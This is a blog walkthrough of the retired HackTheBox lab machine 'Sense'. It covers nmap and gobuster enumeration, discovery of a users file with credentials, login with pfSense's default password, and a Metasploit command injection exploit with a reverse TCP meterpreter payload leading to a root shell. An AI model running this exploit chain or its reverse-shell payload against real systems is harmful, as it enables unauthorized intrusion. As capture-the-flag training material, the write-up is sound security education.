Sense HackTheBox WalkThrough

This is Sense HackTheBox machine walkthrough and is also the 18th machine of our OSCP like HTB Boxes series. In this writeup I have demonstrated step-by-step how I rooted to Sense HackTheBox machine. But, before diving into the hacking part let us know something about this box. It is a FreeBSD OS machine with IP address 10.10.10.60 and difficulty easy assigned by its maker.

Since this machine is retired on HackTheBox platform so you will require VIP subscription to access this machine. So first of all connect your Kali/Parrot machine with HackTheBox VPN and confirm your connectivity with this machine by pinging its IP address 10.10.10.60. If all goes correct then start hacking.

As usual I started by scanning the machine with Nmap. Scanning gives us some idea how we have to proceed further like it helps to find open and closed ports and gives us information of different services running over them. I have used Nmap for this task and the result is given below:-

Scanning

$ nmap -sC -sV -oA nmap/sense 10.10.10.60

$ cat nmap/sense.nmap

Nmap result during Sense Hackthebox walkthrough

Nmap found port 80 and 443 as open. Let us enumerate on these ports. Lighttpd 1.4.35 web server is running on port 80. Let us export our sense.xml file which is created by nmap’s switch -oA to $searchsploit (tool to query exploit-db offline) to check for available exploits on exploit-db.

Searching Available Exploits

$ searchsploit --nmap nmap/sense.xml

Exporting Nmap result to searchsploit

Searchsploit found multiple exploits for Lighttpd. But for our current version no suitable exploit is present. Since web server is running on port 80 and 443 so there must be some website/s running over the URLs http://10.10.10.60 and https://10.10.10.60. Ongoing to the URL http://10.10.10.60 got redirected to https://10.10.10.60. Found a login page of PFsense (pfSense is an open source firewall/router computer software distribution based on FreeBSD).

Pfsense login page

Since it is a login page of a well-known web application so as usual my next step is to login with some default credential like admin: admin, admin: password and admin: kfsense because sometimes admin forget to update default credential of the application. Did the same this time too but none of them worked. Checked the page-source by clicking CTRL+U for some type of hint but found nothing interesting. So nothing left except directory bruteforcing and fuzzing.

Then performed directory bruteforcing on URL https://10.10.10.60/ using $gobuster (directory bruteforcer) along with extension txt and wordlist directory-list-2.3-medium.txt (this wordlist can be found in SecLists directory).

Performing Directory Bruteforcing

$ gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -k -u https://10.10.10.60 -n -x txt -t 50 -s 200

Performing directory bruteforcing in sense htb

Directory bruteforcing found two text files changelog.txt and system-users.txt. On visiting system-users.txt at http://10.10.10.60/system-users.txt found some information about username and password.

Content of System-Users.txt file in Sense Hackthebox writeup

Username is Rohit and password is pointing to default password of the company. After some googling, found that the default password of pfsense is pfsense. When I tried to login with the credential rohit: pfsense at https://10.10.10.60/ got login successful. The installed version of pfsense is 2.1.3-RELEASE.

Dashboard of pfsense

Soon I get information about any application and its version then my next step is to search it over internet for available vulnerability and its exploit. This time I have used Exploit Search Engine https://sploitus.com . It listed multiple authenticated RCE exploits and there is also a metasploit module present. After searching pfsense in metasploit I found exploit/unix/http/pfsense_graph_injection_exec module which worked and get me shell. There are also other ways to exploit this vulnerability without metasploit. You can mirror the exploit from exploit-db using $searchsploit by the command $ searchsploit -m php/webapps/43560.py or download it from Packetstormsecurity website.

Searching for available exploit in sense htb walkthrough

Let us get user shell using Metasploit.

Getting User Shell

msf6 > search pfsense

msf6 > use exploit/unix/http/pfsense_graph_injection_exec

msf6 exploit(unix/http/pfsense_graph_injection_exec) > set RHOSTS 10.10.10.60

msf6 exploit(unix/http/pfsense_graph_injection_exec) > set USERNAME rohit

msf6 exploit(unix/http/pfsense_graph_injection_exec) > set PASSWORD pfsense

msf6 exploit(unix/http/pfsense_graph_injection_exec) > set PAYLOAD php/meterpreter/reverse_tcp

msf6 exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 10.10.14.3

msf6 exploit(unix/http/pfsense_graph_injection_exec) > exploit

meterpreter > sysinfo

meterpreter > getuid

Getting user shell in sense htb

We have got a shell and that too with root user privilege which means we don’t have to perform Privilege Escalation which we used to do. Root user is just like God in FreeBSD and UNIX like OS. Let us capture user and root flag.

Capture User Flag

meterpreter > cat /home/rohit/user.txt

Capturing user flag during Sense Hackthebox walkthrough

Capture Root Flag

meterpreter > cat /root/root.txt

Capturing root flag during Sense Hackthebox walkthrough

This was how I rooted to Pfsense HackTheBox machine. Hope you have got something to learn from this machine walkthrough. Feel free to ask your doubt in the comment section if you face any. Thanks for reading this article. For any query and suggestion related to walkthrough contact us at [email protected].

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/